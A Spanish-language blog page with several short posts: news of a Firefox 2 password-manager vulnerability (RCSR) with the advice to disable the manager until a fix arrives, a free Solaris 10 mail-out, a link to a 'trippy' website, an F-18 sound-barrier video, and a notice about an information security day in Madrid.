El ataque RCSR también funciona sobre Internet Explorer, aunque la vulnerabilidad descubierta en Firefox, hace a estos usuarios especialmente vulnerables.

La vulnerabilidad es bastante grave dado que puede afectar a cualquier visitante de weblog o foro que permita a sus usuarios incluir código HTML en sus mensajes.
Es por ello que sus descubridores recomiendan la especial atención de webmasters y administradores de foros, con los códigos HTML que permiten en sus mensajes.

Desde la Fundación Mozilla ya han anunciado que la vulnerabilidad estará resuelta en la próxima versión de Firefox, la 2.0.1 o 2.0.2.

Hasta que no salga la nueva versión se recomienda desactivar el gestor de contraseñas.
A continuación un enlace al artículo original y una prueba de concepto de la vulnerabilidad.

CIS Finds Flaws in Firefox v2 Password Manager.
Prueba de concepto de la vulnerabilidad

Sun esta Regalando su Solaris 10 y lo envia a las Casas

Sun siguiendo la EXITOSA campaña de CANONICAL ha decidido regalar su Solaris 10 y enviarlo de forma gratuita por correo hasta las casas de los usuarios.

Recuerden que solaris permite ejecutar aplicaciones GNU/Linux sin realizar modificaciones, por lo que el porta folio de programas es bien amplio.

RECIBIR SOLARIS 10 EN CASITA Y DE GORRA!!

LSD EN FORMA DE WEB

Acabo de ver el sitio mas tripi que he visto nunca via meneame, es del creador de los teletubbis o como se llamen
lo mas chungo es que es tan adictivo como los tripis xD

LINK

F-18 ROMPIENDO BARRERA DEL SONIDO

Se que este tema no va de seguridad informatica pero me parecio muy interesante asi que en este video se muestra como un F-18 rompe la barrera del sonido, impresionante!!

Fuente

Dia Internacional De La Seguridad De La Informacion

Segun veo por la red, hoy empezo el dia DISI (dia internacional de la seguridad de la informacion) segun leo se celebra en madrid entre los dias 29 y 30 de noviembre en la universidad politecnica de madrid, yo asistire o lo intentare mañana dia 30 hay mejores ponencias.

Horario Congreso